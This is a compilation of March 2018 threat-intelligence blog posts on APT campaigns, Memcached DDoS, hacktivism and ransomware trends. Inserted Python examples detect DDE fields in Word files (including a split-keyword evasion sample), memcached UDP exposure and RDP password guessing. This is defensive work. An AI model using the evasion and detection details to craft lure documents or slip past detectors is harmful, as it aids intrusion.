The website of the Russian Central Election Commission was reportedly hit by a distributed denial of service (DDoS) attack on 18 Mar 2018. The DDoS monitoring service DDoSMon reported the site was targeted using the Memcached amplification technique, a method recently adopted by a variety of threat actors. Attribution for the attack was unknown; no hacktivist or threat groups had claimed responsibility at the time of writing. The objective was almost certainly to cause disruption and degradation of service, as the timing coincided with the 2018 Russian presidential election.

APT-28 adopts new anti-sandbox evasion technique

Researchers at security company Palo Alto identified two attacks, on 12 and 14 Mar 2018, respectively, targeting an unnamed European government agency with an updated version of the “DealersChoice” Flash exploitation framework. The attacks were attributed to “APT-28” (aka Fancy Bear, Sofacy). Spearphishing emails referencing a security conference were sent with a Microsoft Word (.docx) document attached. A newly observed anti-sandbox evasion technique loaded a malicious Flash object only after a user had scrolled to the third page of the document. This ensured human interaction, and evolved from the previous tactic of a Flash object loading immediately upon the document’s opening. APT-28’s continued use of this new evasion technique is highly likely.

Pop-up Twitter Bots: The Shift to Opportunistic Targeting Thu, 22 Mar 2018 16:10:39 +0000 Since the furor surrounding Russia’s alleged use of Twitter bots to influence the 2016 presidential election in the United States, social media bots have been most commonly associated with carefully planned, long-term campaigns. However, we have observed a shift whereby automated bots increasingly are established to provide an opportunistic reaction to events or individuals, in very short and targeted campaigns. Advances in artificial intelligence will likely facilitate the creation of more believable throwaway bot networks with less investment needed to deliver expedient effects.

We recently worked on a fascinating Request for Information (RFI) from a client. Without disclosing too much, the organization suspected one of its employees had been targeted by Twitter bots. Following research, it appeared our client’s suspicions were correct: bots had been automatically spamming the employee’s Twitter page. Case closed and on to the next RFI.

However, as the dust settled from the task, we began thinking that this reflected a change in the way bots are used to spread disinformation. Bots and their many variants have been around for years and are used by a range of actors in many different ways, be it ISIS “ghost tweeting” its messages to give the appearance of a wider worldwide following, fake Chinese social media posts on Weibo intended to drown out messages about bad news and politically sensitive issues or celebrities using fake followers to increase their online influence. This particular case was interesting for two reasons:

  1. The focused targeting of an individual outside of a significant geopolitical event (albeit with crudely executed content)
  2. The short-term nature of the bots’ activity, initiated in response to a specific event and ended when the campaign’s ostensible goal was achieved

From the Masses to the Individual

Mass targeted disinformation is a well-known phenomenon, given press coverage of the growing number of “troll farms” springing up globally. Since a troll farm is staffed by humans, the farm’s masters can target individual users and engage them in complex and intelligent dialog that appears authentic in its spontaneity. The Holy Grail for this type of malicious actor would be a bot that could engage millions of users with the authenticity of a human troll.

In the case of nation states, campaigns may be part of long-term projects to influence other countries’ public discourse, such as the bots used to influence British politics in the 2016 EU referendum and subsequent election in 2017. This case was different. The bot campaign we were investigating appeared to have been established soon after particular actions by the targeted individual and disbanded immediately after the bots achieved their purpose. The “pop-up” nature of this bot campaign has been reflected in recent media stories: a widespread story about a Muslim woman walking past and ignoring injured victims of the March 2017 terror attack in Westminster has been attributed to a “fake news” bot campaign, and bots were observed attempting to influence the discourse about gun control laws following the February 2017 school shooting in Florida. This suggests actors are establishing bot networks to provide immediate, opportunistic reaction to events.


Where is this trend going in the future?

Technically, the key factor to watch is the development of artificial intelligence (AI), specifically regarding the Turing Test (a computer’s ability to convince a human user they are speaking to another human and not a computer). Given the textual, non-real-time medium of many social media platforms, computers have a distinct advantage in this area, and as early as 2014 some researchers claimed to have AI programs that could pass the Turing Test (Google “Eugene Goostman”).

With this level of authenticity, mass targeted disinformation campaigns become a realistic possibility for the disinformation peddler. These ideas have been expanded upon by authors such as Keir Giles (see: Handbook of Russian Information Warfare), who proposed scenarios whereby bots conduct mass targeted disinformation campaigns on the eve of a large-scale NATO troop mobilization. Such advances in AI also play into the hands of malicious actors creating bots for short-term purposes as they enable more believable bots to be set up swiftly, without spending months teaching bots what to say on a particular topic.

These ideas are not only interesting but important, given the influence that social media-driven news and propaganda currently have across the globe. This applies to nation states at election times, but it is also relevant to businesses. You can read more about disinformation campaigns affecting organizations (as well as how to combat them) in a recent research paper of ours, “The Business of Disinformation.”

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Cyber Security as Public Health Wed, 21 Mar 2018 16:09:19 +0000 Public health, one of the great 20th century ideas, has many instructive lessons for cyber security in the 21st. Let’s recap. Public health was defined by Charles-Edward Winslow in 1920 as:

“Public health is the Science and Art of preventing disease, prolonging life, and promoting health and efficiency through organized community effort for sanitation of the environment, the control of communicable disease, the education of the individual in personal hygiene, the organization of medical and nursing services for early diagnosis and preventive treatment of disease, and the development of the social machinery to insure everyone a standard of living adequate for maintenance of health, so organizing these benefits as to enable every citizen to realize his birthright of health and longevity”

While a lot has changed since 1920, including the use of the singular they, these statements still resonate today. The first statement mentions the interdisciplinary nature of the field. Cyber security truly is both an art and a science, which we will return to at the end of this blog. Let’s break down the key parts of Winslow’s definition:

This mission statement is comprehensive. It mentions both a preventative goal and a longevity goal: we need cyber security to not only be about preventing things but also encouraging the beneficial side effects of security for individuals, communities and marketplaces. The explicit reference to an organized community underlines the need for collective action. No matter how secure you may be as an organization or an individual, we work and play in a shared space. If that space resembles more the “Wild West” rather than an organized society, your experience will suffer irrespective of your own security posture. Winslow goes on to detail what needs to be done:


1. Sanitation of the environment

  • Security engineering, especially the definition and application of secure development lifecycles, to reduce software maintenance costs and increase the reliability of software with respect to security-related bugs.
  • Community action: sharing of security-related information, timely action on takedown requests, and appropriate ingress and egress filtering to prevent malicious traffic.


2. Control of communicable disease

Hardening of systems to make the initial infection as difficult as possible (e.g., disallowing Macros, DDE-enabled documents, etc.) and in the eventual case of infection, to contain the spread as much as possible through segmenting the networks of key systems and monitoring for security events such as credential reuse.
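As an added example (not Digital Shadows’ code), the check below shows how a mail gateway or file-share scanner can flag the DDE-enabled documents the paragraph says should be disallowed. The .docx files are constructed in memory, and the DDE command inside the sample is a placeholder string, not a working payload.

```python
"""Flag Word documents carrying DDE field codes, one of the document types the
text says should be disallowed.  Added example, not Digital Shadows' code.
The .docx files are constructed in memory; the DDE command in the sample is a
placeholder string, not a working payload."""
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.'
    'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
)


def build_docx(body_xml):
    """Minimal .docx: a zip holding [Content_Types].xml and word/document.xml."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="%s">'
           '<w:body>%s</w:body></w:document>' % (W_NS, body_xml))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed sample: ordinary document with a harmless PAGE field.
CLEAN_DOC = build_docx(
    '<w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>'
    '<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
)

# Constructed sample: DDEAUTO keyword split across two instrText runs, the way
# lure documents break up the keyword to defeat naive string matching.
DDE_DOC = build_docx(
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DD</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">EAUTO placeholder-app </w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">"placeholder-args" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Loading...</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)


def field_codes(document_xml):
    """Yield each field instruction in the part, with split instrText runs rejoined.

    Simple fields keep the code in w:fldSimple/@w:instr.  Complex fields use
    w:fldChar begin/separate/end markers with the code spread over one or more
    w:instrText runs between 'begin' and 'separate' (or 'end').
    """
    root = ET.fromstring(document_xml)
    for fs in root.iter(W + "fldSimple"):
        yield fs.get(W + "instr", "")
    buf, in_code = [], False
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                buf, in_code = [], True
            elif kind in ("separate", "end") and in_code:
                yield "".join(buf)
                buf, in_code = [], False
        elif el.tag == W + "instrText" and in_code:
            buf.append(el.text or "")


def find_dde_fields(docx_bytes):
    """Return [(part_name, normalised_field_code)] for every DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        parts = [n for n in z.namelist() if n.startswith("word/") and n.endswith(".xml")]
        for name in parts:
            for code in field_codes(z.read(name)):
                norm = " ".join(code.split())          # collapse whitespace tricks
                if DDE_RE.search(norm.replace('"', "")):
                    hits.append((name, norm))
    return hits


if __name__ == "__main__":
    print("clean:", find_dde_fields(CLEAN_DOC))
    print("dde:  ", find_dde_fields(DDE_DOC))
```

Headers, footers and footnotes live in other `word/*.xml` parts, which is why the scan walks every XML part rather than only `document.xml`.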


3. Education of the individual in personal hygiene

People are often the weakest link in security: not only the individual who clicks on a phishing email, but also the system administrator responsible for patching and securely configuring systems. Training and education are essential for individuals to use the Internet safely, both at work and at home.


4. Organization of medical services for early diagnosis and preventative treatment of disease

The public and private sectors need to work together so that early signs of infection, e.g., destructive outbreaks like WannaCry or NotPetya, are picked up and shared. The more collaboration there is, the better placed we all are to limit the damage incurred by such incidents. Some public-sector organizations already provide comprehensive alerts, such as US-CERT.

Public health covers many different disciplines, just like cyber security. This stems from the important realization that no single focus area is sufficient to improve public health. The success of vaccination programs, for example, depends on a wide range of disciplines. Cyber security, similarly, requires improvements not just in technical fields, although they are sorely needed! Politics, legal issues, regulations, economics and social organization all have a part to play. While we wrestle with the details in our daily work, it’s good to keep in mind the big picture.



Shadow Talk Update – 03.19.2018 Mon, 19 Mar 2018 14:15:48 +0000 This week’s Shadow Talk features the latest techniques in tax return fraud, claimed vulnerabilities in AMD chips, Slingshot malware targeting Mikrotik routers, and Greenflash Sundown Exploit Kit delivering Hermes ransomware.



Slingshot espionage campaign undetected for six years

A newly detected cyber espionage campaign used a compromised router as a foothold to drop malicious information-stealing components onto victims’ devices and networks. The “Slingshot” campaign has targeted almost 100 entities to date, predominantly in the Middle East and Africa. The earliest identified samples dated from 2012, which indicates the campaign has avoided detection for six years. Attribution was unconfirmed at the time of writing; however, the attackers appear to be highly skilled and well resourced, indicating they are potentially state-sponsored.


APT-15 observed targeting UK government contractor

On 10 Mar 2018, researchers at NCC Group reported new activity attributed to APT-15. Two operations impacted an unnamed UK government service provider, with attackers harvesting information pertaining to UK military and government departments. The group used two custom backdoors, custom information-gathering tools and native Windows tools to exfiltrate sensitive information. Following the first operation, which resulted in its ejection from the target network, the group used restructured tactics, techniques and procedures to re-enter the target system. The operations indicated a relatively well-resourced threat actor with a high level of intent to obtain precise information. Although APT-15 has previously been linked to China, there are insufficient indicators to support this attribution at the time of writing.


APT-28 updates operational toolkit

On 09 Mar 2018 the cyber security company Kaspersky published a report describing evolutions in the toolkit and activity of APT-28, a threat group associated with the Russian state. The report assessed that the group now operates in distinct sub-divisions focused on targeting, development and coding. Researchers noted significant overlap of the group’s operations with other APT groups’ activity, including the Russian-state-linked Turla. The report also described updates to the group’s operational toolkit and noted that the group has been observed targeting entities in the Middle East and Asia. APT-28’s operational development and its continued targeting of entities within the political or military landscape correlate with previous activity attributed to the group. Therefore, it remains likely that reports of operational activity and attacks attributed to the group will increase in the short to medium term (one to six months).


CTS Labs discloses 13 alleged AMD processor vulnerabilities

On 14 Mar 2018, CTS Labs detailed 13 vulnerabilities which allegedly allowed an attacker to install malware on AMD processors and permitted access to protected information located in processor chips. CTS Labs claimed it had provided AMD with 24 hours’ notice before publicly disclosing the vulnerabilities. As no technical details were released with the research, Digital Shadows could not analyze the alleged vulnerabilities.


MuddyWater group targets Turkey, Pakistan and Tajikistan

On 12 Mar 2018, Trend Micro, a cyber security company, reported that government and telecommunications entities in Tajikistan, as well as undisclosed sectors in Turkey and Pakistan, were targeted by activity attributed to “MuddyWater”, an espionage group. The group used similar tactics, techniques and procedures to its previous activity: primarily phishing emails with macro-enabled documents to achieve initial compromise. While technical indicators in this attack overlapped with those seen in historical MuddyWater activity, the PowerShell backdoor payload used in the recent attack had been updated, likely in an attempt to remain undetected. At the time of writing there is little information available pertaining to harvested data or the entities affected. The Saudi Arabian NCSC published an advisory on MuddyWater, indicating the group presents a notable threat to targeted entities.


Middlebox HTTP injection redirects deliver spyware

On 09 Mar 2018 the research organization CitizenLab reported two campaigns using PacketLogic deep packet inspection middleboxes to conduct injected HTTP redirects. Internet service provider customers in Egypt were redirected to pages containing cryptocurrency miners in a likely financially motivated attack. Selected Turkish users accessing legitimate domains using HTTP were redirected to download surveillance tools FinFisher or a variant of StrongPity, indicating the attack’s objective was information gathering. The initial infection vector against telecom infrastructure is unknown. Users are encouraged to avoid accessing and downloading content from domains using HTTP, as network traffic is unencrypted and vulnerable to “man in the middle” attacks.


Compromised BitTorrent client distributed by download server

On 13 Mar 2018, Microsoft Defender published research detailing a Smoke Loader campaign delivering CoinMiner, software which can be used to mine cryptocurrency on target systems. The activity produced approximately 500,000 attempted infections within a 12-hour period. The rapid infection rate was due to a compromised executable for the BitTorrent client “MediaGet”, which was distributed via a legitimate program download server and operated as a legitimate program with a backdoor capability that delivered the Smoke Loader downloader and dropped CoinMiner. It was unclear why Smoke Loader and CoinMiner, malware variants with high detection rates by anti-virus solutions, were deployed in an operation which likely required significant planning regarding the initial infection vector.



Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Anonymous and the New Face of Hacktivism: What to Look Out For in 2018 Tue, 13 Mar 2018 15:03:05 +0000 The Anonymous collective has been the face of activism since 2008. Since then, the group’s membership, operations, and structure have changed significantly. In this blog, we examine the changes in Anonymous and look at how the group will continue to change in the coming years.

The Anonymous collective rose to fame in 2008 and 2009. Emerging from the quagmire of 4chan’s /b/ board, an imageboard for “random” content (Figure 1), the group quickly gained followers after ‘Project Chanology’, a 2008/9 campaign against Scientology. This blended relatively new tactics, like mass distributed denial of service (DDoS) attacks that rendered the main Scientology websites offline, with old-school phreaking and traditional protests.

Figure 1: The original /b/ post starting Project Chanology

The group continued to gain momentum, targeting opponents of internet piracy and websites of financial institutions that had withdrawn banking facilities from Wikileaks under OpPayback in 2010. The combination of widespread, disruptive DDoS attacks and their ability to publicize their campaigns led to Time magazine naming Anonymous as one of the 100 most influential people in the world in 2012.

Although the collective continued its operations, including OpIsrael and OpIcarus, the popularity and media attention gained by the group peaked in November 2016 during OpIsis and OpParis, both operations targeting supporters of Islamic State.

So, what happened to make “one of the most influential people” in the world fade from consciousness so quickly?

1. Anonymous has reached critical mass

Simply put, the group has become too big to be effective. Contrary to its original advertising and statements, the formative stages of the group were strictly hierarchical. Operations were organized on central forums and Internet Relay Chat (IRC) channels, with details approved by a series of moderators. This level of coordination enabled the organization and impact of their early operations.

Conversely, the family-friendly tactics (the Anonymous term for an operation that uses only legal tactics, such as reporting accounts for takedown) of OpIsis acted as a membership recruitment drive, leading to a huge influx of members with little to no technical capabilities. With such a large number of people, focused operations have become harder to organize, as motives and skills divide. Older members talk about the dilution of the brand (Figure 2). The lack of a central organizational point means that operations and attacks are diverse, uncoordinated, and largely small scale.

Figure 2: Reddit users discuss the change in the Anonymous identity

2. Anonymous no longer encapsulates the cultural Zeitgeist

From 2010, Anonymous was synonymous with populist protest for the first half of the decade. The group’s brand – the Guy Fawkes mask from the 1984 ‘V for Vendetta’ graphic novel – was linked with the Occupy movement’s early protests in 2011, and the Million Mask March, held in 2013. Anonymous became associated with anti-establishment protests.

However, in 2018, this zeitgeist has changed. The Occupy movement has largely faded from public consciousness, and global politics has moved on. The proliferation of low level operations has changed the way the public view the collective, and without publicity the impact of their operations is greatly lessened. Furthermore, the lack of media coverage and the dilution of the brand have led to an exodus of the more technically capable members to smaller groups, leaving very little of the original collective behind.

3. Anonymous lacks a popular cause

When Anonymous began, the collective played to a relatively populist agenda. Chanology responded to growing media doubts about the nature of scientology, and OpPayback played on the public profile of Wikileaks. OpIcarus captured the anti-financial sector feeling as the news broke about high financial sector salaries despite austerity and the European debt crisis. OpIsis and OpParis both linked in with huge waves of outrage after the attacks in Paris in November 2015.

Since then, the collective has been unable to find a cause that both unites members within the collective and captures the attention of the outside world. Smaller operations have been created – OpSyria, OpTurkey, OpDomesticTerrorism – but the main attack phase has rarely lasted beyond one month, and has not been adopted by more than two or three factions. Although the group originated as a vaguely anarchic collective, there is an inherent hero complex evident in the group’s collective language: without a cause, members are likely to move on.

Given this, what’s next for the collective, and for the threat from hacktivist groups?

1. Family-friendly and opportunistic attacks

It is highly likely that central Anonymous affiliates will continue to conduct legacy operations, such as OpIsis, OpSyria, and OpDomesticTerrorism. However, as the influence and capabilities of the group are waning, these are likely to be confined to “family-friendly” and opportunistic attacks, either reporting social media accounts, or claiming DDoS attacks against smaller companies with weak cyber security.

2. Regional groups

The dilution of the central brand has coincided with a rise in the number of regional and national groups. Factions such as AnonymousBrasil, AnonymousCatalunya, and AnonPlus are all smaller, more focused, and have closer ties to regional politics. This enables them to mount persistent and targeted campaigns. Operations such as OpOlympicHacking were able to cause real disruption because AnonymousBrasil was able to coordinate activities amongst its members, and was linked to a traditional political objective. Although it is unlikely that the capabilities of these groups will grow beyond DDoS and website defacement attacks, their operations are likely to become longer and more targeted.

Figure 3: OpOlympicHacking banner, October 2016 (source: Twitter)

3. Breakaway Groups

Older members – and more nostalgic members – of the collective have already started to break away into smaller groups reminiscent of 2009. In 2017 there were a significant number of groups claiming to be LulzSec and AntiSec reborn. However, these groups are unlikely to match the impact of their namesakes: a lack of media attention and impact means that the members drift apart relatively quickly.

Figure 4: CyberGuerrilla were the first group to break away in 2014


The capabilities of the Anonymous collective were never technical: instead, they relied on causing disruption and gathering enough media attention to amplify their perceived influence. As we head into 2018, public attention has moved on, directed at threat groups with both the capability and intent to cause destruction and disruption. The Anonymous brand is likely to live on in smaller, regional hacktivist groups who will target companies in line with regional and national geopolitical objectives, but the days of mass projects and mass campaigns are over.


Shadow Talk Update – 03.12.2018 Mon, 12 Mar 2018 15:09:50 +0000 This week’s Shadow Talk features more distributed denial of service (DDoS) attacks using Memcached servers, how disinformation is more than just a political concern, updates on the Spectre vulnerability following the release of a new proof of concept (PoC) exploit, and more reporting on the historical network intrusion against the German government.

Memcached DDoS attacks break peak volume records

Attackers using Memcached reflection, a type of DDoS attack, have twice achieved the highest recorded peak volumes since 27 February. An attack on the code-sharing website GitHub reached 1.35Tbps, and a subsequent attack on an unnamed company in the United States peaked at 1.7Tbps. The peak was helped by the availability of internet-facing Memcached servers listening on user datagram protocol (UDP) port 11211 without traffic filtering. The media attention garnered by these attacks likely prompted opportunistic extortion attempts reported in the past week. Efforts have been made to reduce the number of internet-facing Memcached servers susceptible to this attack method, but the threat is unlikely to disappear in the next month.
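The exposure described above comes down to two memcached settings: whether UDP is enabled (`-U`) and which address the daemon binds (`-l`). As an added example, not Digital Shadows’ or the memcached project’s code, the check below reads a configuration in the Debian/Ubuntu `/etc/memcached.conf` style and reports a weak config beside a hardened one; both configs are constructed samples.

```python
"""Assess a memcached configuration for the UDP exposure abused in Memcached
reflection attacks.  Added example, not Digital Shadows' or the memcached
project's code.  The two configs below are constructed samples in the
Debian/Ubuntu /etc/memcached.conf style (one option per line)."""
import shlex
from ipaddress import ip_address

# Constructed sample: UDP left enabled on 11211 and no -l, so the daemon binds
# every interface and will answer spoofed UDP requests from the internet.
WEAK_CONF = """
# memcached config (constructed sample)
-d
logfile /var/log/memcached.log
-m 64
-p 11211
-U 11211
-u memcache
"""

# Constructed sample: UDP disabled (-U 0) and TCP listener bound to loopback.
HARDENED_CONF = """
-d
-m 64
-p 11211
-U 0
-l 127.0.0.1
-u memcache
"""


def parse_memcached_conf(text):
    """Pull out the two options that decide reflection exposure.

    -U <port> sets the UDP port (0 disables UDP); -l <addr[,addr]> sets the
    bind address(es).  memcached 1.5.6 and later default to UDP off, but an
    explicit -U 11211 re-enables it, so a missing -U is reported as unknown
    rather than assumed safe.
    """
    opts = {"udp_port": None, "bind": []}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = shlex.split(line)
        if parts[0] == "-U" and len(parts) > 1:
            opts["udp_port"] = int(parts[1])
        elif parts[0] == "-l" and len(parts) > 1:
            opts["bind"].extend(a.strip() for a in parts[1].split(","))
    return opts


def is_publicly_bound(addrs):
    """True unless every bind address is loopback or private (RFC 1918 / ULA) space."""
    if not addrs:
        return True          # no -l means INADDR_ANY
    for a in addrs:
        host = a.rsplit(":", 1)[0] if a.count(":") == 1 else a  # strip an IPv4 port
        try:
            ip = ip_address(host)
        except ValueError:
            return True      # hostname we cannot resolve offline: treat as exposed
        if ip.is_unspecified or not (ip.is_loopback or ip.is_private):
            return True
    return False


def assess(text):
    """Return the findings a reviewer would raise for this config (empty = OK)."""
    opts = parse_memcached_conf(text)
    findings = []
    if opts["udp_port"] is None:
        findings.append("UDP port not set explicitly; confirm the build defaults to -U 0")
    elif opts["udp_port"] != 0:
        findings.append(f"UDP enabled on port {opts['udp_port']}: reflection/amplification risk")
    if is_publicly_bound(opts["bind"]):
        findings.append("listener not restricted with -l to loopback or a private address")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, assess(conf) or ["no findings"])
```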


Disinformation campaign aimed at Persian speakers

A disinformation campaign intended to influence Persian speakers and discredit Western media outlets has been in operation for approximately seven years. The campaign implicated some legitimate media outlets, such as the BBC, by establishing fake websites impersonating them. No malware was delivered in this campaign. Despite the use of disinformation campaigns for political objectives, the wide availability of tools and relatively low costs associated with performing these operations means that disinformation is also a threat to businesses in a variety of industries. Download a copy of our research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.


Researchers publish PoC exploit for SgxPectre

Researchers at the University of Ohio, in the United States, released PoC code for a vulnerability dubbed SgxPectre, a claimed variation of the “Spectre” vulnerability. SgxPectre enables unauthorized access to sensitive data protected by Intel’s Software Guard eXtensions (SGX). The vulnerability affects runtime libraries, meaning any program using SGX is potentially vulnerable. Release of any PoC code has previously encouraged threat actors to attempt exploitation of vulnerabilities, but in this case no such attempts have yet been detected. It is not known which types of information can be accessed by exploiting this vulnerability, or how easy it is to exploit.


Historical compromise of German government now linked to Turla

Attackers infected 17 computers in the German Federal Foreign Office with an undisclosed malware variant. The malware exfiltrated data and received commands using Microsoft Outlook. The intrusion, first reported 28 February 2018, affected the Foreign Office from March 2017 to December 2017. Attribution was initially made to the threat group “APT-28” (aka Fancy Bear), but journalists later cited the threat group “Turla”. The attack was said to be part of a wider campaign affecting multiple geographies and was likely conducted by a well-resourced group.



Ransomware in 2018: 4 Things to Look Out For Thu, 08 Mar 2018 23:59:00 +0000 Ransomware remains an active threat for organizations into 2018. Last year, large scale attacks like NotPetya and WCry wreaked havoc, shutting systems and costing millions of dollars in recovery. To develop effective mitigation strategies, we need to closely analyze the ever-evolving ransomware landscape. In particular, we expect developments in four broad areas, namely: ransomware delivery mechanisms, lateral movement tools, service models, and payment mechanisms.

Ransomware Developments in 2018

 1. Delivery mechanisms

Ransomware can be delivered by multiple vectors. To limit the need for initial user interaction, threat actors are using exposed internet-facing infrastructure, like Remote Desktop Protocol (RDP), as an entry vector. This is partly due to availability, especially as RDP credentials or brute-forcing tools are easily purchasable on criminal forums. However, there are also tactical and operational reasons for this: RDP gives interactive access to a machine, meaning that threat actors can identify specific areas of valuable data or even move laterally across networks.


Figure 1: RDP brute forcing tool advertised for $4.25 on criminal marketplace

Other remote entry vectors that ransomware operators can target include Internet Information Services (IIS) or JBoss application servers.
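Because RDP brute forcing is bought rather than built, the defender’s side of this is catching the password guessing in the Windows Security log before a credential lands. The detection below is an added example, not Digital Shadows’ code: it counts Event ID 4625 failures of RDP logon types per source address in a sliding window, over a constructed CSV export of Security events.

```python
"""Detect RDP password guessing in a Windows Security log export.  Added example,
not Digital Shadows' code.  Event ID 4625 is a failed logon; LogonType 10
(RemoteInteractive) is the classic RDP case and, with Network Level
Authentication enabled, RDP guesses surface as LogonType 3 (Network), so both
are counted.  The export below is a constructed sample in a plain CSV shape."""
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample: one source cycling through usernames, one legitimate user
# who mistypes once and then succeeds (4624), and one local console failure.
SAMPLE_EXPORT = """TimeCreated,EventID,LogonType,TargetUserName,IpAddress
2018-03-06T02:14:01,4625,10,administrator,203.0.113.45
2018-03-06T02:14:03,4625,10,admin,203.0.113.45
2018-03-06T02:14:04,4625,3,backup,203.0.113.45
2018-03-06T02:14:06,4625,10,scanner,203.0.113.45
2018-03-06T02:14:07,4625,10,test,203.0.113.45
2018-03-06T02:14:09,4625,10,sqlsvc,203.0.113.45
2018-03-06T02:15:30,4625,10,jsmith,198.51.100.7
2018-03-06T02:15:31,4624,10,jsmith,198.51.100.7
2018-03-06T09:00:00,4625,2,jsmith,127.0.0.1
"""

RDP_LOGON_TYPES = {"10", "3"}


def parse_failed_rdp_logons(text):
    """Return (timestamp, source_ip, username) for every 4625 of an RDP logon type."""
    events = []
    for row in csv.DictReader(StringIO(text)):
        if row["EventID"] != "4625" or row["LogonType"] not in RDP_LOGON_TYPES:
            continue
        ts = datetime.strptime(row["TimeCreated"], "%Y-%m-%dT%H:%M:%S")
        events.append((ts, row["IpAddress"], row["TargetUserName"]))
    return events


def find_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Sliding-window count of failures per source IP.

    A source is reported when `threshold` or more failures fall inside any
    `window`.  Distinct usernames are kept because many names with few tries
    each is the spraying pattern that brute-forcing tools typically produce.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, items in by_ip.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                users = sorted({u for _, u in items})
                alerts[ip] = {
                    "attempts": len(items),
                    "distinct_users": len(users),
                    "first": items[0][0].isoformat(),
                    "last": items[-1][0].isoformat(),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, detail in find_bruteforce(parse_failed_rdp_logons(SAMPLE_EXPORT)).items():
        print(ip, detail)
```

A single mistyped password from a known user falls under the threshold, while the spraying source is reported with the breadth of usernames it tried.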

 2. Self-propagation

Self-propagation mechanisms leverage the damaging impact of a single endpoint infection. Companies with locked down external networks may have flat internal networks, producing conditions for ransomware to self-propagate. Self-propagation is becoming popular among ransomware operators because:

  • Tools like PsExec and the Windows Management Instrumentation Command-line (WMIC) can be driven from batch script files to automate lateral movement within networks
  • Vulnerability exploits are available, for example SMB exploit “EternalBlue” used during WCry
  • Malicious groups can demand larger extortion amounts with multiple infections, or produce a highly damaging attack like NotPetya

 3. Ransomware as a service (RaaS)

Ransomware as a service (RaaS) models give threat actors without skills or resources the ability to deliver ransomware. Like other as a service models, users can sign up to platforms that provide backend infrastructure to manage operations. While RaaS is not new, the continued emergence of new variants shows the service remains in active development, and that a market still exists for it. This service model opens the ransomware marketplace to a wider variety of threat actors, while still remaining profitable for developers as they generally receive a percentage of each infection.

 4. Payment mechanisms

Ransomware variants deployed in financially motivated attacks live and die by profit generation. Payment mechanisms are currently an area of weakness for ransomware developers, as they are often neither automated nor scalable. Ransomware operators tend to rely on email or Tor sites with cryptocurrency payments, which likely reduces operational effectiveness. Some variants have fully automated payment infrastructure, from infection to payment and delivery of decryption keys; however, these are relatively limited. Large, self-propagating attacks to date have had poorly implemented payment infrastructure – as seen with the WCry attack, which had only three Bitcoin wallets to receive payment due to a bug in the malware’s code.


Building your Ransomware Playbook

Establishing a ransomware playbook can help preparation for an eventual attack. The playbook can be used to define specific roles and functions should the unwanted occur, allowing organizations to establish tactics for managing a ransomware infection, as well as strategies for dealing with the aftermath. An effective ransomware playbook:

  • Requires a whole-of-business approach to planning. Ransomware affects multiple business areas and may result in large scale service disruption
  • Plans responses to extortion demands and identifies “worst case” scenarios
  • Shows an understanding of your playing field and adversaries. Threat intelligence can help to inform approaches to ransomware attacks

For more insight into the ransomware ecosystem, join our live webinar on “Emerging Ransomware Threats and How to Protect Your Data” being held on 15 March 2018. Hear from Digital Shadows’ analysts and the FBI Cyber Division’s leading ransomware investigator about the latest threats and vectors, as well as best practices for protecting you and your organization.

Pressing For Progress This International Women’s Day Thu, 08 Mar 2018 06:27:19 +0000 “Do you think you’re going to be able to handle working with all these men?”

One of the few questions over the course of my career that momentarily stunned me during the interview process, this happened over 20 years ago when I was interviewing for a more technical role in my current company at that time. I say stunned because the question had never occurred to me and this is in spite of growing up during a time when I knew I could be an astronaut (thank you Sally Ride!), but had resigned myself to the fact that “girls can’t be President”.  It sounds ridiculous now to type it, but these were the facts of my life growing up in the southern part of the US, in a very conservative, church-going family and long before the Internet was a thing.

As I ponder our upcoming International Women’s Day and think about the path my own life has taken, I am truly both in awe of how far we’ve come and simultaneously, how far we have yet to go. It has only been in the last few years that I’ve realized a lot of my behaviors have been influenced by unconscious bias, from my parents, teachers, friends, peers and colleagues so I am encouraged to see the dialogue continuing today through the various movements around the world.  

